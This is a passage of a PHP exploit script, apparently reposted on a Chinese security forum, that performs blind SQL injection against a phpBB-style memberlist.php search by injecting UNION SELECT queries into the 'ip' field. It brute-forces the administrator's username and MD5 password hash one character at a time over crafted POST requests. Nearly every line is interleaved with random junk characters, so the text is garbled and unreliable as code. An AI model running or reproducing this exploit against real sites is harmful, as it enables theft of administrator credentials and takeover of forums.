    / p6 M2 ?6 D+ B7 b- ^$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id ,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; 0 m! c4 E" B5 x: G$ N5 j
    echo "sql -> ".$sql."
    ) u; N; V/ o/ X, t, N";
    / r0 J6 q! w6 l+ z$sql=urlencode(strtoupper($sql));
    % d2 x0 G! q- ]: J' `! ]$data="username=";
    4 C/ Y" N" w! p9 X' h% M$data.="&amp;icq=";
    * p0 C/ l( C( x+ W9 @$data.="&amp;email=";
    . z' N5 K7 [+ @, X- X& I$data.="&amp;aim=";
    3 P" i* c1 [8 z% i( a! W. @$data.="&amp;joined_select=lt";
    2 t% j- _; l: K6 u$data.="&amp;joined="; ; d% U/ R9 y( p8 Y6 A9 z
    $data.="&amp;yahoo="; 2 _# \  D7 f' h8 x* B) Z
    $data.="&amp;active_select=lt";
    ) e7 o& d8 Y" ?- A: @2 b( j# s$data.="&amp;active="; 3 ^7 r1 |  R/ u- l
    $data.="&amp;msn="; . c% c. P- w1 s; T
    $data.="&amp;count_select=eq";
    , q  N8 E4 T9 s7 l& l  [9 S$data.="&amp;count="; ! I, j) p' Z7 n+ F) i  H
    $data.="&amp;jabber="; * P4 Q% {8 a/ _- Z7 N; S) E
    $data.="&amp;sk=c"; ) `8 `7 }' S  l: V
    $data.="&amp;sd=a"; / l$ N6 S3 s/ c0 o+ D+ ]
    $data.="&amp;ip=".$sql; 5 H( ]. B( {4 r/ X0 n! Q( o* q
    $data.="&amp;search_group_id=0"; . Y$ Z7 g& ?' k6 D5 u" l1 d# X5 {* p
    $data.="&amp;submit=Search"; ! ]+ v. E1 [/ E0 F1 x2 b$ {& }
    $packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.03 x8 d- s+ ?5 \' @& M' W
    ";
    ' I) _: f! K$ m; _$packet.="Content-Type: application/x-www-form-urlencoded
    5 g5 Y$ p3 O# O7 w5 q: N: ?# q";
    . b) U3 F- y8 J  C4 Z$packet.="Host: ".$host."( b6 p- c9 ~; Q" E
    "; : P3 L$ L" v  v+ _8 G! F
    $packet.="Content-Length: ".strlen($data)."
    5 L8 y% D0 ~# R";
    & C/ [0 _: }$ T, q3 q1 _6 J$packet.="Connection: Close" }: ?* _( s% C( [6 B- V% n
    "; ; U; d& k% H. H
    $packet.="Cookie: ".$cookie." 3 {6 n: A& z( L

    5 j: W1 a% g) L"; 3 ^* N" u8 A# T* t% q2 u- }
    $packet.=$data; % @% b, G' \9 l8 [
    sendpacketii($packet);
    " n3 m% I8 c5 u8 `/ e: sif (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]! G- Q$ @  w: ^" ~0 d! Q
    ";sleep(2);break;}
    ; L& J, d+ q, _}
    2 f( c% z7 g& K4 [/ }4 i3 B/ d. D8 Y% uif ($i==255) {die("Exploit failed...");}
    # z0 x0 |0 Y3 U$j++; 5 r# Y' |5 k3 t0 i  c! M7 j/ C
    } 1 \" n- T1 H+ D' E# g
    echo "--------------------------------------------------------------------3 b/ V  d( Y0 W6 ]1 z$ V
    "; - D( d7 x. h* @* Q, r* ~
    echo "admin -> ".$admin."( e4 r# S# e, [# o& S
    ";
    # Q( O; J7 S  V- o+ f' }; |& K9 ~echo "password (md5) -> ".$password."
    ) ~- J5 L5 O- A2 q5 m4 f1 T/ G( J"; 9 T' _# B( ]8 s( D
    echo "--------------------------------------------------------------------" q9 ~4 M- Y4 F# b
    ";
    3 a. _8 w8 q1 B  u0 e; Zfunction is_hash($hash) 1 g; Q3 F4 u; k$ B2 Y) C4 v2 c
    { . L8 j( E6 Z  s( p
    if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
    * o1 B' B% k; e1 Z( ~. L: S3 Melse {return false;}
    8 f3 V; v1 L' J. Y( _} + P- w- l9 Y4 X
    if (is_hash($password)) {echo "Exploit succeeded...";}
    ( C5 w% B" g8 y% b- Belse {echo "Exploit failed...";}
    5 k/ h  \0 t# |6 r1 D?>
    ( J" u+ k3 L$ Q- n4 V
    * [% m/ X1 o) D, K/ M' r; X& D* P1 s! a0 j# g

    7 Z2 a8 t0 g6 x; Y4 G2 l$ p: m+ W7 r
    3 h0 `9 {, H+ ?9 g6 y; ^' d$ F' i$ @

    ) p+ s; Z! ~/ u+ e% x! O$ q4 a$ t! D' p3 a7 y4 ^; @
    2 m( A! j- c+ I
    $ ~, u& f+ {  f7 l* k0 D

    ) z0 _" Y8 R) v1 ^6 L- Q9 F
    & s& k4 ~) l- c$ ~
    # K* \5 f$ R& r% |4 m% C- O" k! @5 ^( Z  \

    4 i. @0 l( Q% R* G, ?2 r( q. `* N! p! T4 S2 M! H1 _; y

    : A: c" G' Z' N# @/ J& O% d; v( n/ m% m/ W$ T7 B

    ' j* U3 i, Z% u5 ^2 b. d1 N8 U公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表